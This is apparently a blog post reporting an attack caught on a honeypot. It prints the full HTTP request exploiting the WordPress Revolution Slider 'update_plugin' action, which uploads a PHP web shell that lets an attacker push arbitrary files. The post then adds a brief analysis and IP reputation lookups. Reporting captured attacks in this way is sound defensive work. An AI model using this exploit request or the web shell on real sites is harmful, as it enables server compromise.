BEGIN OF HTTP DATA:received yesterday on my honeypot.
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"
revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"
update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html
<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
The attack seems to be optimized for Wordpress and targets /wp-admin/admin-ajax.php directly. As you can see in the code, it tries to upload a php file.
IBM XForce has no record on this ip.
IPVoid instead:
| Analysis Date | 2 seconds ago |
| Blacklist Status | BLACKLISTED 2/40 |
| IP Address | 192.203.127.198 ( Websites Lookup ) |
| Reverse DNS | Unknown |
| ASN | AS7018 |
| ASN Owner | AT&T Services, Inc. |
| ISP | Tuskegee University |
| Continent | North America |
| Country Code |  (US) United States |
| Latitude / Longitude | 32.4172 / -85.7191 |
| City | Tuskegee Institute |
| Region | Alabama |
Keine Kommentare:
Kommentar veröffentlichen